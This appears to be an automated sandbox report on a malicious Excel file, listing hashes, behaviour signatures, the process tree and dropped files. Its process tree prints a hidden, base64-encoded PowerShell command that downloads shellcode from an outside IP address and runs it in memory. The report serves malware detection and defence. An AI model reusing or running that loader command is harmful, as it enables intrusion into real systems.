Analysis

  • max time kernel
    47s
  • max time network
    37s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-11-2024 21:50

General

  • Target

    cfec6baca826341f3101312b42f296509e2bcba6a32597fcf6589a3a076124b9.xls

  • Size

    46KB

  • MD5

    62c462f23b7c02a5feff2574b3a5da02

  • SHA1

    e4de389e9fc5a5ed7d99f9fc31d98496d7ea7a93

  • SHA256

    cfec6baca826341f3101312b42f296509e2bcba6a32597fcf6589a3a076124b9

  • SHA512

    60f9a662839f1a82db4b5b648fc430b15ad50399221ad06dc816a663ae5aed7df68ed117687cb5e53fd14fbe85ba001c315228d2d3ab9a3c32daa3a9b294763c

  • SSDEEP

    768:a4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:5SFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\cfec6baca826341f3101312b42f296509e2bcba6a32597fcf6589a3a076124b9.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3048
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3192
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3arafkkd\3arafkkd.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2620
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7AAE.tmp" "c:\Users\Admin\AppData\Local\Temp\3arafkkd\CSCE318E16B44C941C6BDCAA884FD7C7C.TMP"
          4⤵
            PID:2512

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\3arafkkd\3arafkkd.dll

      Filesize

      3KB

      MD5

      f4c4d7ba39659c262fb1d7f8f3487dba

      SHA1

      1cf2e3e5056ba8bc958fa6bff72de49c36b1ae81

      SHA256

      80aeb6897720306b50a420ace33a5911dcb7c84754417a6ec3c49e17fe6cca31

      SHA512

      d0879e9900620f23089d4f1c4c3adf59902ca727dfe76b3786fd3de65151bbbbf2e425f07859625c8d1ccffccbe3ee0ac74921a877617426c2d4a47b75f6984f

    • C:\Users\Admin\AppData\Local\Temp\RES7AAE.tmp

      Filesize

      1KB

      MD5

      cebf3f6af5cefa5505d17f5c409b753e

      SHA1

      6e8253526587a3d4c87de942ef290db057cd9641

      SHA256

      91a1a297670bf6822a648eb7e82b6d68f31523be709170bac33bacd5260c9e1f

      SHA512

      3b36f632ab74b35975a416e78574763b6a333f9bef21345463bd83eab63e1da152d262a0546b0e1c19727056d4756a7f9565f90ce6ad1e69a10ab2704c6f52c2

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2brk1vhz.4qo.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

      Filesize

      2KB

      MD5

      43ec985c40043c7a8626afadadb681dc

      SHA1

      92ad1b0578bdeb2e1664da8f26265c66507e9ba6

      SHA256

      092799540413c0a7bae84ecb75485815dbf891bc153c9c5d936b258fafa58c9f

      SHA512

      a558ebd0ad663417fc872e0a96e69283746bad892cd1bb638fefe9938a82b6f1c52547205b212fe7a51c386b9886a2b59ae9ada0ecddd881ce6bdc701a41adb8

    • \??\c:\Users\Admin\AppData\Local\Temp\3arafkkd\3arafkkd.0.cs

      Filesize

      631B

      MD5

      f4dd5c682eb7b3b679f084261bfc7c4c

      SHA1

      70f75d7a4e42c185eb09139ed3c6f7338a2219c2

      SHA256

      2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

      SHA512

      8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

    • \??\c:\Users\Admin\AppData\Local\Temp\3arafkkd\3arafkkd.cmdline

      Filesize

      369B

      MD5

      e31d3263e90e129e3c2d4759bd062555

      SHA1

      ed221b20412008b938a38aa75356cf6d4711633a

      SHA256

      cb90920e1f3099e168b371e1423e53ca66dfa7db310d22fee08dc352ef9962a2

      SHA512

      6ef5797b346dcf08616bbcf3bc2a93134f36b323a4fcbf0a67ffdaea27a950275d28027e888a28bbdc6b43ca5cb6c01d3f47508fc85f70546f1b8eed1308d85a

    • \??\c:\Users\Admin\AppData\Local\Temp\3arafkkd\CSCE318E16B44C941C6BDCAA884FD7C7C.TMP

      Filesize

      652B

      MD5

      2792148cce6edfbe825b5d7022048d3e

      SHA1

      fd19e75e876432793b9959aefca91c76917ac9cb

      SHA256

      129e08af9899fcad7e21cd3feea385559d93cb81295ae3cbef5ded935af81984

      SHA512

      e65c32d78b3797014076805680fc14423abb490aa70046d78f182409d87a9d60c229c341c3c8db28f62e738712ed61fa83a5034bb6e83c269f5e32d92354083c

    • memory/3048-12-0x00007FF7D7BF0000-0x00007FF7D7C00000-memory.dmp

      Filesize

      64KB

    • memory/3048-31-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-13-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-15-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-14-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-11-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-16-0x00007FF7D7BF0000-0x00007FF7D7C00000-memory.dmp

      Filesize

      64KB

    • memory/3048-18-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-19-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-17-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-9-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-8-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-6-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-0-0x00007FF7D9E50000-0x00007FF7D9E60000-memory.dmp

      Filesize

      64KB

    • memory/3048-32-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-1-0x00007FF7D9E50000-0x00007FF7D9E60000-memory.dmp

      Filesize

      64KB

    • memory/3048-10-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-7-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-2-0x00007FF7D9E50000-0x00007FF7D9E60000-memory.dmp

      Filesize

      64KB

    • memory/3048-3-0x00007FF819E6D000-0x00007FF819E6E000-memory.dmp

      Filesize

      4KB

    • memory/3048-4-0x00007FF7D9E50000-0x00007FF7D9E60000-memory.dmp

      Filesize

      64KB

    • memory/3048-5-0x00007FF7D9E50000-0x00007FF7D9E60000-memory.dmp

      Filesize

      64KB

    • memory/3048-65-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-61-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3192-57-0x000002A7CE5F0000-0x000002A7CE5F8000-memory.dmp

      Filesize

      32KB

    • memory/3192-35-0x000002A7CE600000-0x000002A7CE622000-memory.dmp

      Filesize

      136KB